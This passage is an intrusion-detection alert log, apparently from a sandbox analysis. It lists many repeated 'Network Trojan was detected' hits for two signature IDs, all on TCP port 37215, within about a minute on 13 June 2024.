              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694268
              SID:2829579
              Source Port:58326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043236
              SID:2829579
              Source Port:41700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123531
              SID:2835222
              Source Port:39348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420138
              SID:2829579
              Source Port:50094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153460
              SID:2829579
              Source Port:42718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265866
              SID:2829579
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108005
              SID:2835222
              Source Port:52224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158344
              SID:2835222
              Source Port:50134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076276
              SID:2835222
              Source Port:38902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989146
              SID:2835222
              Source Port:44196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106348
              SID:2835222
              Source Port:44136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274475
              SID:2829579
              Source Port:41566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635925
              SID:2835222
              Source Port:42116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976751
              SID:2835222
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824839
              SID:2829579
              Source Port:40192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694954
              SID:2829579
              Source Port:42626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087079
              SID:2829579
              Source Port:41432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248467
              SID:2829579
              Source Port:35762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755361
              SID:2829579
              Source Port:40190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177887
              SID:2829579
              Source Port:55362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973858
              SID:2829579
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487300
              SID:2829579
              Source Port:47430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043705
              SID:2829579
              Source Port:36002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176815
              SID:2829579
              Source Port:36992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273578
              SID:2829579
              Source Port:45164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246570
              SID:2835222
              Source Port:50100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155006
              SID:2829579
              Source Port:50984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672455
              SID:2835222
              Source Port:44762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075934
              SID:2829579
              Source Port:42062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974580
              SID:2829579
              Source Port:46534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546598
              SID:2829579
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078596
              SID:2835222
              Source Port:50398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678880
              SID:2829579
              Source Port:37712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158664
              SID:2835222
              Source Port:56936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783429
              SID:2829579
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088187
              SID:2829579
              Source Port:44320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307652
              SID:2835222
              Source Port:35842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217128
              SID:2835222
              Source Port:51488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401934
              SID:2835222
              Source Port:49600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376562
              SID:2829579
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609864
              SID:2829579
              Source Port:45628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632751
              SID:2835222
              Source Port:44782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975864
              SID:2835222
              Source Port:42762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823752
              SID:2835222
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223385
              SID:2829579
              Source Port:35828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262929
              SID:2835222
              Source Port:37936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128771
              SID:2835222
              Source Port:51100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093505
              SID:2835222
              Source Port:40242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093339
              SID:2829579
              Source Port:41548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632126
              SID:2829579
              Source Port:50650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191987
              SID:2829579
              Source Port:37772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278941
              SID:2835222
              Source Port:48262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729599
              SID:2829579
              Source Port:48382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175752
              SID:2835222
              Source Port:57770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277854
              SID:2835222
              Source Port:44322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478314
              SID:2829579
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751203
              SID:2835222
              Source Port:53490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132899
              SID:2835222
              Source Port:49700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126293
              SID:2829579
              Source Port:38356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787311
              SID:2835222
              Source Port:55288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751359
              SID:2835222
              Source Port:49792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278861
              SID:2835222
              Source Port:38380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194395
              SID:2835222
              Source Port:37874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010098
              SID:2829579
              Source Port:54752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216397
              SID:2829579
              Source Port:41704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079848
              SID:2829579
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401076
              SID:2829579
              Source Port:47722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633867
              SID:2835222
              Source Port:57264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181451
              SID:2829579
              Source Port:43848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488056
              SID:2835222
              Source Port:58704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477640
              SID:2835222
              Source Port:38600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567701
              SID:2829579
              Source Port:33452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841840
              SID:2829579
              Source Port:58022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610586
              SID:2829579
              Source Port:54020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371018
              SID:2835222
              Source Port:54462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611921
              SID:2829579
              Source Port:38042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419999
              SID:2835222
              Source Port:43070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631872
              SID:2829579
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422059
              SID:2829579
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694487
              SID:2835222
              Source Port:46812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839728
              SID:2835222
              Source Port:42772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696063
              SID:2829579
              Source Port:55866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155758
              SID:2829579
              Source Port:34822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127207
              SID:2835222
              Source Port:54842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993482
              SID:2829579
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078537
              SID:2829579
              Source Port:42448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439828
              SID:2835222
              Source Port:36308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610342
              SID:2829579
              Source Port:52384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509270
              SID:2835222
              Source Port:53826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216440
              SID:2835222
              Source Port:51932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128549
              SID:2829579
              Source Port:49664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091555
              SID:2829579
              Source Port:50734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321443
              SID:2835222
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935491
              SID:2835222
              Source Port:51944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973710
              SID:2829579
              Source Port:43778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159837
              SID:2835222
              Source Port:58910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725998
              SID:2829579
              Source Port:49692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.566964
              SID:2835222
              Source Port:54018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729772
              SID:2835222
              Source Port:50914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094210
              SID:2829579
              Source Port:50424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046243
              SID:2835222
              Source Port:58658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156323
              SID:2829579
              Source Port:49612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026404
              SID:2835222
              Source Port:59016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100164
              SID:2829579
              Source Port:38770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970678
              SID:2835222
              Source Port:35814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991744
              SID:2829579
              Source Port:53058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697298
              SID:2835222
              Source Port:56164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422694
              SID:2829579
              Source Port:47298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378345
              SID:2835222
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245198
              SID:2829579
              Source Port:42696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224399
              SID:2829579
              Source Port:40362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056381
              SID:2829579
              Source Port:58982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129809
              SID:2829579
              Source Port:59386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977881
              SID:2835222
              Source Port:37066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374013
              SID:2829579
              Source Port:38356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375947
              SID:2835222
              Source Port:46936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527641
              SID:2829579
              Source Port:35662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724457
              SID:2835222
              Source Port:51408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527762
              SID:2829579
              Source Port:58358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610012
              SID:2835222
              Source Port:34820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802832
              SID:2835222
              Source Port:54528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041121
              SID:2829579
              Source Port:51626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567257
              SID:2835222
              Source Port:46156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976159
              SID:2835222
              Source Port:35444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268913
              SID:2835222
              Source Port:34290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801605
              SID:2835222
              Source Port:55740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041562
              SID:2829579
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258608
              SID:2829579
              Source Port:47186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350147
              SID:2829579
              Source Port:53998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041992
              SID:2829579
              Source Port:55584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252832
              SID:2829579
              Source Port:55686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092637
              SID:2835222
              Source Port:34798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350560
              SID:2835222
              Source Port:56706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123580
              SID:2829579
              Source Port:49754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749280
              SID:2835222
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545004
              SID:2835222
              Source Port:46152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756699
              SID:2835222
              Source Port:55676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724757
              SID:2829579
              Source Port:46740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089041
              SID:2829579
              Source Port:34038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214025
              SID:2829579
              Source Port:45066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629856
              SID:2829579
              Source Port:60184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111117
              SID:2829579
              Source Port:39516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670439
              SID:2835222
              Source Port:45942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295467
              SID:2829579
              Source Port:46346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757050
              SID:2835222
              Source Port:47090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177643
              SID:2835222
              Source Port:38184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165019
              SID:2835222
              Source Port:38682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657897
              SID:2835222
              Source Port:41254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109021
              SID:2835222
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669525
              SID:2829579
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632458
              SID:2835222
              Source Port:39816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610057
              SID:2829579
              Source Port:58196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191631
              SID:2829579
              Source Port:46456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609976
              SID:2835222
              Source Port:59016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988385
              SID:2835222
              Source Port:48656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750554
              SID:2829579
              Source Port:54680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440495
              SID:2835222
              Source Port:41950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042636
              SID:2829579
              Source Port:33402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258672
              SID:2835222
              Source Port:50584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754426
              SID:2835222
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129929
              SID:2835222
              Source Port:46652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655898
              SID:2829579
              Source Port:42596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945699
              SID:2829579
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696834
              SID:2835222
              Source Port:37108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929186
              SID:2829579
              Source Port:42582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420035
              SID:2835222
              Source Port:47510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695550
              SID:2829579
              Source Port:46200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991652
              SID:2835222
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099639
              SID:2829579
              Source Port:48894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078824
              SID:2829579
              Source Port:55534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610768
              SID:2835222
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165840
              SID:2835222
              Source Port:37664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872038
              SID:2835222
              Source Port:60820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833753
              SID:2829579
              Source Port:33954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159295
              SID:2829579
              Source Port:52924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090839
              SID:2835222
              Source Port:52174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079746
              SID:2835222
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868044
              SID:2835222
              Source Port:35864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129442
              SID:2829579
              Source Port:55364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045562
              SID:2835222
              Source Port:51488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680059
              SID:2829579
              Source Port:53900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978730
              SID:2835222
              Source Port:50230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277333
              SID:2835222
              Source Port:53186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991862
              SID:2835222
              Source Port:35802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630718
              SID:2835222
              Source Port:35424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086969
              SID:2829579
              Source Port:45668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488432
              SID:2835222
              Source Port:37634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418084
              SID:2829579
              Source Port:37904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439456
              SID:2829579
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090919
              SID:2835222
              Source Port:50950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695061
              SID:2829579
              Source Port:42604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974860
              SID:2835222
              Source Port:42870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128231
              SID:2829579
              Source Port:39602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176668
              SID:2829579
              Source Port:42576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458509
              SID:2829579
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176842
              SID:2829579
              Source Port:38384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867032
              SID:2829579
              Source Port:43610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
